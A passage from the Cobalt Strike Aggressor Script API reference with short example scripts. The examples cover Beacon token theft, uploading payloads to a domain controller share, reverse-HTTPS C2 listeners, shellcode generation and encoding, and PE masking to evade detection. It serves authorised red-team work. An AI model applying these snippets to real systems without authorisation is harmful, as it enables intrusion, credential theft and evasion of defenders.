$2 - the array of PIDs to take the tokens from.
$3 - the OpenProcessToken access mask.
Example
alias token-store_steal {
btoken_store_steal($1, @(int($2)), 11);
}
btoken_store_steal_and_use
Ask Beacon to steal a token, store it and immediately apply it to the beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to take the token from.
$3 - the OpenProcessToken access mask.
Example
alias token-store_steal_and_use {
btoken_store_steal_and_use($1, int($2), 11);
}
btoken_store_use
Ask Beacon to use a token from the token store.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the token ID.
Example
alias token-store_use {
btoken_store_use($1, int($2));
}
bunlink
Ask Beacon to delink a Beacon its connected to over a TCP socket or named pipe.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target host to unlink (specified as an IP address)
$3 - (optional) the PID of the target session to unlink
Example
bunlink($1, "172.16.48.3");
bupload
Ask a Beacon to upload a file
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path to the file to upload
Example
bupload($1, script_resource("evil.exe"));
bupload_raw
Ask a Beacon to upload a file
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the remote file name of the file
$3 - the raw content of the file
$4 - (optional) the local path to the file (if there is one)
Example
$data = artifact("my listener", "exe");
bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);
bwdigest
REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly.
bwinrm
REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in options.
bwmi
REMOVED Removed in Cobalt Strike 4.0.
call
Issue a call to the team server.
Arguments
$1 - the command name
$2 - a callback to receive a response to this request. The callback will receive two arguments. The first is the call name. The second is the response.
... - one or more arguments to pass into this call.
Example
call("aggressor.ping", { warn(@_); }, "this is my value");
closeClient
Close the current Cobalt Strike team server connection.
Example
closeClient();
colorPanel
Generate a Java component to set accent colors within Cobalt Strike's data model
Arguments
$1 - the prefix
$2 - an array of IDs to change colors for
Example
popup targets {
menu "&Color" {
insert_component(colorPanel("targets", $1));
}
}
See also
credential_add
Add a credential to the data model
Arguments
$1 - username
$2 - password
$3 - realm
$4 - source
$5 - host
Example
command falsecreds {
for ($x = 0; $x < 100; $x++) {
credential_add("user $+ $x", "password $+ $x");
}
}
credentials
Returns a list of application credentials in Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each credential entry.
Example
printAll(credentials());
custom_event
Broadcast a custom event to all Cobalt Strike clients.
Arguments
$1 - the topic name
$2 - the event data
Example
custom_event("my-topic", %(foo => 42, bar => "hello"));
custom_event_private
Send a custom event to one specific Cobalt Strike client.
Arguments
$1 - who to send the custom event to
$2 - the topic name
$3 - the event data
Example
custom_event_private("neo", "my-topic", 42);
data_keys
List the query-able keys from Cobalt Strike's data model
Returns
A list of keys that you may query with &data_query
Example
foreach $key (data_keys()) {
println("\n\c4=== $key ===\n");
println(data_query($key));
}
data_query
Queries Cobalt Strike's data model
Arguments
$1 - the key to pull from the data model
Returns
A Sleep representation of the queried data.
Example
println(data_query("targets"));
dbutton_action
Adds an action button to a &dialog. When this button is pressed, the dialog closes and its callback is called. You may add multiple buttons to a dialog. Cobalt Strike will line these buttons up in a row and center them at the bottom of the dialog.
Arguments
$1 - the $dialog object
$2 - the button label
Example
dbutton_action($dialog, "Start"); dbutton_action($dialog, "Stop");
dbutton_help
Adds a Help button to a &dialog. When this button is pressed, Cobalt Strike will open the user's browser to the specified URL.
Arguments
$1 - the $dialog object
$2 - the URL to go to
Example
dbutton_help($dialog, "http://www.google.com");
dialog
Create a dialog. Use &dialog_show to show it.
Arguments
$1 - the title of the dialog
$2 - a %dictionary mapping row names to default values
$3 - a callback function. Called when the user presses a &dbutton_action button. $1 is a reference to the dialog. $2 is the button name. $3 is a dictionary that maps each row's name to its value.
Returns
A scalar with a $dialog object.
Example
sub callback {
# prints: Pressed Go, a is: Apple
println("Pressed $2 $+ , a is: " . $3['a']);
}
$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
drow_text($dialog, "a", "Fruit: ");
drow_text($dialog, "b", "Rodent: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);
dialog_description
Adds a description to a &dialog
Arguments
$1 - a $dialog object
$2 - the description of this dialog
Example
dialog_description($dialog, "I am the Hello World dialog.");
dialog_show
Shows a &dialog.
Arguments
$1 - the $dialog object
Example
dialog_show($dialog);
dispatch_event
Call a function in Java Swing's Event Dispatch Thread. Java's Swing Library is not thread safe. All changes to the user interface should happen from the Event Dispatch Thread.
Arguments
$1 - the function to call
Example
dispatch_event({
println("Hello World");
});
downloads
Returns a list of downloads in Cobalt Strike's data model.
Returns
An array of dictionary objects with information about each downloaded file.
Example
printAll(downloads());
drow_beacon
Adds a beacon selection row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_beacon($dialog, "bid", "Session: ");
drow_checkbox
Adds a checkbox to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
$4 - the text next to the checkbox
Example
drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");
drow_combobox
Adds a combobox to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
$4 - an array of options to choose from
Example
drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));
drow_exploits
Adds a privilege escalation exploit selection row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_exploits($dialog, "exploit", "Exploit: ");
drow_file
Adds a file chooser row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_file($dialog, "file", "Choose: ");
drow_interface
Adds a VPN interface selection row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_interface($dialog, "int", "Interface: ");
drow_krbtgt
Adds a krbtgt selection row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_krbtgt($dialog, "hash", "krbtgt hash: ");
drow_listener
Adds a listener selection row to a &dialog. This row only shows listeners with stagers (e.g., windows/beacon_https/reverse_https).
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_listener($dialog, "listener", "Listener: ");
drow_listener_smb
DEPRECATED This function is deprecated in Cobalt Strike 4.0. It's now equivalent to &drow_listener_stage
drow_listener_stage
Adds a listener selection row to a &dialog. This row shows all Beacon and Foreign listener payloads.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_listener_stage($dialog, "listener", "Stage: ");
drow_mailserver
Adds a mail server field to a &dialog.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_mailserver($dialog, "mail", "SMTP Server: ");
drow_proxyserver
DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is now tied directly to the listener.
Adds a proxy server field to a &dialog.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_proxyserver($dialog, "proxy", "Proxy: ");
drow_site
Adds a site/URL field to a &dialog.
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_site($dialog, "url", "Site: ");
drow_text
Adds a text field row to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
$4 - Optional. The width of this text field (in characters). This value isn't always honored (it won't shrink the field, but it will make it wider).
Example
drow_text($dialog, "name", "Name: ");
drow_text_big
Adds a multi-line text field to a &dialog
Arguments
$1 - a $dialog object
$2 - the name of this row
$3 - the label for this row
Example
drow_text_big($dialog, "addr", "Address: ");
dstamp
Format a time into a date/time value. This value includes seconds.
Arguments
$1 - the time [milliseconds since the UNIX epoch]
Example
println("The time is now: " . dstamp(ticks()));
See also
elog
Publish a notification to the event log
Arguments
$1 - the message
Example
elog("The robot invasion has begun!");
encode
Obfuscate a position-independent blob of code with an encoder.
Arguments
$1 - position independent code (e.g., shellcode, "raw" stageless Beacon) to apply encoder to
$2 - the encoder to use
$3 - the architecture (e.g., x86, x64)
| Encoder | Description |
|---|---|
| alpha | Alphanumeric encoder (x86-only) |
| xor | XOR encoder |
Notes
- The encoded position-independent blob must run from a memory page that has RWX permissions or the decode step will crash the current process.
- alpha encoder: The EDI register must contain the address of the encoded blob. &encode prepends a 10-byte (non-alphanumeric) program to the beginning of the alphanumeric encoded blob. This program calculates the location of the encoded blob and sets EDI for you. If you plan to set EDI yourself, you may remove these first 10 bytes.
Returns
A position-independent blob that decodes the original string and passes execution to it.
Example
# generate shellcode for a listener
$stager = shellcode("my listener", false "x86");
# encode it.
$stager = encode($stager, "xor", "x86");
extract_reflective_loader
Extract the executable code for a reflective loader from a Beacon Object File (BOF).
Arguments
$1 - Beacon Object File data that contains a reflective loader.
Returns
The Reflective Loader binary executable code extracted from the Beacon Object File data.
Example
See BEACON_RDLL_GENERATE hook
# --------------------------------------------------------------------- # extract loader from BOF. # --------------------------------------------------------------------- $loader = extract_reflective_loader($data);
file_browser
Open the File Browser. This function does not have any parameters.
fireAlias
Runs a user-defined alias
Arguments
$1 - the beacon id to run the alias against
$2 - the alias name to run
$3 - the arguments to pass to the alias.
Example
# run the foo alias when a new Beacon comes in
on beacon_initial {
fireAlias($1, "foo", "bar!");
}
fireEvent
Fire an event.
Arguments
$1 - the event name
... - the event arguments.
Example
on foo {
println("Argument is: $1");
}
fireEvent("foo", "Hello World!");
format_size
Formats a number into a size (e.g., 1024 => 1kb)
Arguments
$1 - the size to format
Returns
A string representing a human readable data size.
Example
println(format_size(1024));
getAggressorClient
Returns the aggressor.AggressorClient Java object. This can reach anything internal within the current Cobalt Strike client context.
Example
$client = getAggressorClient();
gunzip
Decompress a string (GZIP).
Arguments
$1 - the string to compress
Returns
The argument processed by the gzip de-compressor
Example
println(gunzip(gzip("this is a test")));
See also
gzip
GZIP a string.
Arguments
$1 - the string to compress
Returns
The argument processed by the gzip compressor
Example
println(gzip("this is a test"));
See also
highlight
Insert an accent (color highlight) into Cobalt Strike's data model
Arguments
$1 - the data model
$2 - an array of rows to highlight
$3 - the accent type
Notes
- Data model rows include: applications, beacons, credentials, listeners, services, and targets.
- Accent options are:
| Accent | Color |
|---|---|
| [empty] | no highlight |
| good | Green |
| bad | Red |
| neutral | Yellow |
| ignore | Grey |
| cancel | Dark Blue |
Example
command admincreds {
local('@creds');
# find all of our creds that are user Administrator.
foreach $entry (credentials()) {
if ($entry['user'] eq "Administrator") {
push(@creds, $entry);
}
}
# highlight all of them green!
highlight("credentials", @creds, "good");
}
host_delete
Delete a host from the targets model
Arguments
$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]
Example
# clear all hosts host_delete(hosts());
host_info
Get information about a target.
Arguments
$1 - the host IPv4 or IPv6 address
$2 - [Optional] the key to extract a value for
Returns
%info = host_info("address");
Returns a dictionary with known information about this target.
$value = host_info("address", "key");
Returns the value for the specified key from this target's entry in the data model.
Example
# create a script console alias to dump host info
command host {
println("Host $1");
foreach $key => $value (host_info($1)) {
println("$[15]key $value");
}
}
host_update
Add or update a host in the targets model
Arguments
$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]
$2 - the DNS name of this target
$3 - the target's operating system
$4 - the operating system version number (e.g., 10.0)
$5 - a note for the target.
Note
You may specify a $null value for any argument and, if the host exists, no change will be made to that value.
Example
host_update("192.168.20.3", "DC", "Windows", 10.0);
hosts
Returns a list of IP addresses from Cobalt Strike's target model
Returns
An array of IP addresses
Example
printAll(hosts());
insert_component
Add a javax.swing.JComponent object to the menu tree
Arguments
$1 - the component to add
insert_menu
Bring menus associated with a popup hook into the current menu tree.
Arguments
$1 - the popup hook
... - additional arguments are passed to the child popup hook.
Example
popup beacon {
# menu definitions above this point
insert_menu("beacon_bottom", $1);
# menu definitions below this point
}
iprange
Generate an array of IPv4 addresses based on a string description
Arguments
$1 - a string with a description of IPv4 ranges
| Range | Result |
|---|---|
| 192.168.1.2 | The IP4 address 192.168.1.2 |
| 192.168.1.1, 192.168.1.2 | The IPv4 addresses 192.168.1.1 and 192.168.1.2 |
| 192.168.1.0/24 | The IPv4 addresses 192.168.1.0 through 192.168.1.255 |
| 192.168.1.18-192.168.1.30 | The IPv4 addresses 192.168.1.18 through 192.168.1.29 |
| 192.168.1.18-30 | The IPv4 addresses 192.168.1.18 through 192.168.1.29 |
Returns
An array of IPv4 addresses within the specified ranges.
Example
printAll(iprange("192.168.1.0/25"));
keystrokes
Returns a list of keystrokes from Cobalt Strike's data model.
Returns
An array of dictionary objects with information about recorded keystrokes.
Example
printAll(keystrokes());
licenseKey
DEPRECATED This function is deprecated in Cobalt Strike 4.6. The function will now return an empty string.
Get the license key for this instance of Cobalt Strike
Returns
Your license key.
Example
println("Your key is: " . licenseKey());
listener_create
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &listener_create_ext
Create a new listener.
Arguments
$1 - the listener name
$2 - the payload (e.g., windows/beacon_http/reverse_http)
$3 - the listener host
$4 - the listener port
$5 - a comma separated list of addresses for listener to beacon to
Example
# create a foreign listener
listener_create("My Metasploit", "windows/foreign_https/reverse_https",
"ads.losenolove.com", 443);
# create an HTTP Beacon listener
listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
"www.losenolove.com", 80,
"www.losenolove.com, www2.losenolove.com");
listener_create_ext
Create a new listener.
Arguments
$1 - the listener name
$2 - the payload (e.g., windows/beacon_http/reverse_http)
$3 - a map with key/value pairs that specify options for the listener
Note
The following payload options are valid for $2:
| Payload | Type |
|---|---|
| windows/beacon_dns/reverse_dns_txt | Beacon DNS |
| windows/beacon_http/reverse_http | Beacon HTTP |
| windows/beacon_https/reverse_https | Beacon HTTPS |
| windows/beacon_bind_pipe | Beacon SMB |
| windows/beacon_bind_tcp | Beacon TCP |
| windows/beacon_extc2 | External C2 |
| windows/foreign/reverse_http | Foreign HTTP |
| windows/foreign/reverse_https | Foreign HTTPS |
The following keys are valid for $3:
| Key | DNS | HTTP/S | SMB | TCP (Bind) |
|---|---|---|---|---|
| althost | HTTP Host Header | |||
| bindto | bind port | bind port | ||
| beacons | c2 hosts | c2 hosts | bind host | |
| host | staging host | staging host | ||
| maxretry | maxretry | maxretry | ||
| port | c2 port | c2 port | pipe name | port |
| profile | profile variant | |||
| proxy | proxy config | |||
| strategy | host rotation | host rotation |
The following host rotation Values are valid for the 'strategy' Key:
| Option |
|---|
| round-robin |
| random |
| failover |
| failover-5x |
| failover-50x |
| failover-100x |
| failover-1m |
| failover-5m |
| failover-15m |
| failover-30m |
| failover-1h |
| failover-3h |
| failover-6h |
| failover-12h |
| failover-1d |
| rotate-1m |
| rotate-5m |
| rotate-15m |
| rotate-30m |
| rotate-1h |
| rotate-3h |
| rotate-6h |
| rotate-12h |
| rotate-1d |
Note
The maxretry value uses the following syntax of exit-[max_attempts]-[increase_attempts]-[duration][m,h,d]. For example 'exit-10-5-5m' will exit beacon after 10 failed attempts and will increase sleep time after 5 failed attempts to 5 minutes. The sleep time will not be updated if the current sleep time is greater than the specified duration value. The sleep time will be affected by the current jitter value. On a successful connection the failed attempts count will be reset to zero and the sleep time will be reset to the prior value.
The proxy configuration string is the same string you would input into Cobalt Strike's listener dialog. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:[email protected]:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior.
Example
# create a foreign listener
listener_create_ext("My Metasploit", "windows/foreign/reverse_https",
%(host => "ads.losenolove.com", port => 443));
# create an HTTP Beacon listener
listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http",
%(host => "www.losenolove.com", port => 80,
beacons => "www.losenolove.com, www2.losenolove.com"));
# create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
%(host => "stage.host",
profile => "default",
port => 80,
beacons => "b1.host,b2.host",
althost => "alt.host",
bindto => 8080,
strategy => "failover-5x",
max_retry => "exit-10-5-5m",
proxy => "proxy.host"));
listener_delete
Stop and remove a listener.
Arguments
$1 - the listener name
Example
listener_delete("Beacon HTTP");
listener_describe
Describe a listener.
Arguments
$1 - the listener name
$2 - (optional) the remote target the listener is destined for
Returns
A string describing the listener
Example
foreach $name (listeners()) {
println("$name is: " . listener_describe($name));
}
listener_info
Get information about a listener.
Arguments
$1 - the listener name
$2 - (optional) the key to extract a value for
Returns
%info = listener_info("listener name");
Returns a dictionary with the metadata for this listener.
$value = listener_info("listener name", "key");
Returns the value for the specified key from this listener's metadata
Example
# create a script console alias to dump listener info
command dump {
println("Listener $1");
foreach $key => $value (listener_info($1)) {
println("$[15]key $value");
}
}
listener_pivot_create
Create a new pivot listener.
Arguments
$1 - the Beacon ID
$2 - the listener name
$3 - the payload (e.g., windows/beacon_reverse_tcp)
$4 - the listener host
$5 - the listener port
Note
The only valid payload argument is windows/beacon_reverse_tcp.
Example
# create a pivot listener:
# $1 = beaconID, $2 = name, $3 = port
alias plisten {
local('$lhost $bid $name $port');
# extract our arguments
($bid, $name, $port) = @_;
# get the name of our target
$lhost = beacon_info($1, "computer");
btask($1, "create TCP listener on $lhost $+ : $+ $port");
listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost, $port);
}
listener_restart
Restart a listener
Arguments
$1 - the listener name
Example
listener_restart("Beacon HTTP");
listeners
Return a list of listener names (with stagers only!) across all team servers this client is connected to.
Returns
An array of listener names.
Example
printAll(listeners());
listeners_local
Return a list of listener names. This function limits itself to the current team server only. External C2 listener names are omitted.
Returns
An array of listener names.
Example
printAll(listeners_local());
listeners_stageless
Return a list of listener names across all team servers this client is connected to. External C2 listeners are filtered (as they're not actionable via staging or exporting as a Reflective DLL).
Returns
An array of listener names.
Example
printAll(listeners_stageless());
localip
Get the IP address associated with the team server.
Returns
A string with the team server's IP address.
Example
println("I am: " . localip());
menubar
Add a top-level item to the menubar.
Arguments
$1 - the description
$2 - the popup hook
Example
popup mythings {
item "Keep out" {
}
}
menubar("My &Things", "mythings");
mynick
Get the nickname associated with the current Cobalt Strike client.
Returns
A string with your nickname.
Example
println("I am: " . mynick());
nextTab
Activate the tab that is to the right of the current tab.
Example
bind Ctrl+Right {
nextTab();
}
on
Register an event handler. This is an alternate to the on keyword.
Arguments
$1 - the name of the event to respond to
$2 - a callback function. Called when the event happens.
Example
sub foo {
blog($1, "Foo!");
}
on("beacon_initial", &foo);
openAboutDialog
Open the "About Cobalt Strike" dialog
Example
openAboutDialog();
openApplicationManager
Open the application manager (system profiler results) tab.
Example
openApplicationManager();
openAutoRunDialog
Open the auto run dialog.
Example
openAutoRunDialog();
openBeaconBrowser
Open the beacon browser tab.
Example
openBeaconBrowser();
openBeaconConsole
Open the console to interact with a Beacon
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "Interact" {
local('$bid');
foreach $bid ($1) {
openBeaconConsole($bid);
}
}
openBrowserPivotSetup
open the browser pivot setup dialog
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "Browser Pivoting" {
local('$bid');
foreach $bid ($1) {
openBrowserPivotSetup($bid);
}
}
openBypassUACDialog
REMOVED Removed in Cobalt Strike 4.1.
openCloneSiteDialog
Open the dialog for the website clone tool.
Example
openCloneSiteDialog();
openConnectDialog
Open the connect dialog.
Example
openConnectDialog();
openCovertVPNSetup
open the Covert VPN setup dialog
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "VPN Pivoting" {
local('$bid');
foreach $bid ($1) {
openCovertVPNSetup($bid);
}
}
openCredentialManager
Open the credential manager tab.
Example
openCredentialManager();
openDefaultShortcutsDialog
Open the Default Keyboard Shortcuts dialog. This function does not have any parameters.
openDownloadBrowser
Open the download browser tab
Example
openDownloadBrowser();
openElevateDialog
Open the dialog to launch a privilege escalation exploit.
Arguments
$1 - the beacon ID
Example
item "Elevate" {
local('$bid');
foreach $bid ($1) {
openElevateDialog($bid);
}
}
openEventLog
Open the event log.
Example
openEventLog();
openFileBrowser
Open the file browser for a Beacon
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "Browse Files" {
local('$bid');
foreach $bid ($1) {
openFileBrowser($bid);
}
}
openGoldenTicketDialog
open a dialog to help generate a golden ticket
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "Golden Ticket" {
local('$bid');
foreach $bid ($1) {
openGoldenTicketDialog($bid);
}
}
openHTMLApplicationDialog
Open the HTML Application Dialog.
Example
openHTMLApplicationDialog();
openHostFileDialog
Open the host file dialog.
Example
openHostFileDialog();
openInterfaceManager
Open the tab to manage Covert VPN interfaces
Example
openInterfaceManager();
openJavaSignedAppletDialog
Open the Java Signed Applet dialog
Example
openJavaSignedAppletDialog();
openJavaSmartAppletDialog
Open the Java Smart Applet dialog
Example
openJavaSmartAppletDialog();
openJumpDialog
Open Cobalt Strike's lateral movement dialog
Arguments
$1 - the type of lateral movement. See &beacon_remote_exploits for a list of options. ssh and ssh-key are options too.
$2 - an array of targets to apply this action against
Example
openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));
openKeystrokeBrowser
Open the keystroke browser tab
Example
openKeystrokeBrowser();
openListenerManager
Open the listener manager
Example
openListenerManager();
openMakeTokenDialog
open a dialog to help generate an access token
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "Make Token" {
local('$bid');
foreach $bid ($1) {
openMakeTokenDialog($bid);
}
}
openMalleableProfileDialog
Open the malleable C2 profile dialog.
Example
openMalleableProfileDialog();
openOfficeMacro
Open the office macro export dialog
Example
openOfficeMacroDialog();
openOneLinerDialog
Open the dialog to generate a PowerShell one-liner for this specific Beacon session.
Arguments
$1 - the beacon ID
Example
item "&One-liner" {
openOneLinerDialog($1);
}
openOrActivate
If a Beacon console exists, make it active. If a Beacon console does not exist, open it.
Arguments
$1 - the Beacon ID
Example
item "&Activate" {
local('$bid');
foreach $bid ($1) {
openOrActivate($bid);
}
}
openPayloadGeneratorDialog
Open the Payload Generator dialog.
Example
openPayloadGeneratorDialog();
openPayloadHelper
Open a payload chooser dialog.
Arguments
$1 - a callback function. Arguments: $1 - the selected listener.
Example
openPayloadHelper(lambda({
bspawn($bid, $1);
}, $bid => $1));
openPivotListenerSetup
open the pivot listener setup dialog
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "Listener..." {
local('$bid');
foreach $bid ($1) {
openPivotListenerSetup($bid);
}
}
openPortScanner
Open the port scanner dialog
Arguments
$1 - an array of targets to scan
Example
openPortScanner(@("192.168.1.3"));
openPortScannerLocal
Open the port scanner dialog with options to target a Beacon's local network
Arguments
$1 - the beacon to target with this feature
Example
item "Scan" {
local('$bid');
foreach $bid ($1) {
openPortScannerLocal($bid);
}
}
openPowerShellWebDialog
Open the dialog to setup the PowerShell Web Delivery Attack
Example
openPowerShellWebDialog();
openPreferencesDialog
Open the preferences dialog
Example
openPreferencesDialog();
openProcessBrowser
Open a process browser for one or more Beacons
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
item "Processes" {
openProcessBrowser($1);
}
openSOCKSBrowser
Open the tab to list SOCKS proxy servers
Example
openSOCKSBrowser();
openSOCKSSetup
open the SOCKS proxy server setup dialog
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "SOCKS Server" {
local('$bid');
foreach $bid ($1) {
openSOCKSSetup($bid);
}
}
openScreenshotBrowser
Open the screenshot browser tab
Example
openScreenshotBrowser();
openScriptConsole
Open the Aggressor Script console.
Example
openScriptConsole();
openScriptManager
Open the tab for the script manager.
Example
openScriptManager();
openScriptedWebDialog
Open the dialog to setup a Scripted Web Delivery Attack
Example
openScriptedWebDialog();
openServiceBrowser
Open service browser dialog
Arguments
$1 - an array of targets to show services for
Example
openServiceBrowser(@("192.168.1.3"));
openSiteManager
Open the site manager.
Example
openSiteManager();
openSpawnAsDialog
Open dialog to spawn a payload as another user
Arguments
$1 - the Beacon ID to apply this feature to
Example
item "Spawn As..." {
local('$bid');
foreach $bid ($1) {
openSpawnAsDialog($bid);
}
}
openSpearPhishDialog
Open the dialog for the spear phishing tool.
Example
openSpearPhishDialog();
openSystemInformationDialog
Open the system information dialog.
Example
openSystemInformationDialog();
openSystemProfilerDialog
Open the dialog to setup the system profiler.
Example
openSystemProfilerDialog();
openTargetBrowser
Open the targets browser
Example
openTargetBrowser();
openWebLog
Open the web log tab.
Example
openWebLog();
openWindowsDropperDialog
REMOVED Removed in Cobalt Strike 4.0.
openWindowsExecutableDialog
Open the dialog to generate a Windows executable.
Example
openWindowsExecutableDialog();
openWindowsExecutableStage
Open the dialog to generate a stageless Windows executable.
Example
openWindowsExecutableStage();
openWindowsExecutableStageAllDialog
Open the dialog to generate all of the stageless payloads (in x86 and x64) for all of the configured listeners. This dialog can also be found in the UI menu under Payloads -> Windows Stageless Generate all Payloads.
Example
openWindowsExecutableStageAllDialog();
payload
Exports a raw payload for a specific Cobalt Strike listener.
Arguments
$1 - the listener name
$2 - x86|x64 the architecture of the payload
$3 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.
$4 - A string value for the system call method. Valid values are:
Direct: Use the Nt* version of the function.
Indirect: Jump to the appropriate instruction within the Nt* version of the function.
$5 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).
Returns
A scalar containing position-independent code for the specified listener.
Example
$data = payload("my listener", "x86", "process", "Direct");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
payload_bootstrap_hint
Get the offset to function pointer hints used by Beacon's Reflective Loader. Populate these hints with the asked-for process addresses to have Beacon load itself into memory in a more OPSEC-safe way.
Arguments
$1 - the payload position-independent code (specifically, Beacon)
$2 - the function to get the patch location for
Notes
- Cobalt Strike's Beacon has a protocol to accept artifact-provided function pointers for functions required by Beacon's Reflective Loader. The protocol is to patch the location of GetProcAddress and GetModuleHandleA into the Beacon DLL. Use of this protocol allows Beacon to load itself in memory without triggering shellcode detection heuristics that monitor reads of kernel32's Export Address Table. This protocol is optional. Artifacts that don't follow this protocol will fallback to resolving key functions via the Export Address Table.
- The Artifact Kit and Resource Kit both implement this protocol. Download these kits to see how to use this function.
Returns
The offset to a memory location to patch with a pointer for a specific function used by Beacon's Reflective Loader.
payload_local
Exports a raw payload for a specific Cobalt Strike listener. Use this function when you plan to spawn this payload from another Beacon session. Cobalt Strike will generate a payload that embeds key function pointers, needed to bootstrap the agent, taken from the parent session's metadata.
Arguments
$1 - the parent Beacon session ID
$2 - the listener name
$3 - x86|x64 the architecture of the payload
$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.
$5 - A string value for the system call method. Valid values are:
Direct: Use the Nt* version of the function.
Indirect: Jump to the appropriate instruction within the Nt* version of the function.
$6 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).
Returns
A scalar containing position-independent code for the specified listener.
Example
$data = payload_local($bid, "my listener", "x86", "process", "None");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
pe_insert_rich_header
Insert rich header data into Beacon DLL Content. If there is existing rich header information, it will be replaced.
Arguments
$1 - Beacon DLL content
$2 - Rich header
Returns
Updated DLL Content
Note
The rich header length should be on a 4 byte boundary for subsequent checksum calculations.
Example
# ------------------------------------- # Insert (replace) rich header # ------------------------------------- $rich_header = "<your rich header info>"; $temp_dll = pe_insert_rich_header($temp_dll, $rich_header);
pe_mask
Mask data in the Beacon DLL Content based on position and length.
Arguments
$1 - Beacon DLL content
$2 - Start location
$3 - Length to mask
$4 - Byte value mask key (int)
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask {
local('$temp_dll, $start, $length, $maskkey');
local('%pemap');
local('@loc_en, @val_en');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc_en = values(%pemap, @("Export.Name."));
@val_en = values(%pemap, @("Export.Name."));
if (size(@val_en) != 1) {
warn("Unexpected size of export name value array: " . size(@val_en));
} else {
warn("Current export value: " . @val_en[0]);
}
if (size(@loc_en) != 1) {
warn("Unexpected size of export location array: " . size(@loc_en));
} else {
warn("Current export name location: " . @loc_en[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$start = parseNumber(@loc_en[0], 10);
$length = 4;
$maskkey = 22;
# -------------------------------------
# mask some data in a dll
# -------------------------------------
# warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
$temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# un-mask (running the same mask a second time should "un-mask")
# (This would normally be done by the reflective loader)
# -------------------------------------
# warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
# $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_mask_section
Mask data in the Beacon DLL Content based on position and length.
Arguments
$1 - Beacon DLL content
$2 - Section name
$3 - Byte value mask key (int)
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_section {
local('$temp_dll, $section_name, $maskkey');
local('@loc_en, @val_en');
$temp_dll = $1;
# -------------------------------------
# Set parameters
# -------------------------------------
$section_name = ".text";
$maskkey = 23;
# -------------------------------------
# mask a section in a dll
# -------------------------------------
# warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
$temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# un-mask (running the same mask a second time should "un-mask")
# (This would normally be done by the reflective loader)
# -------------------------------------
# warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
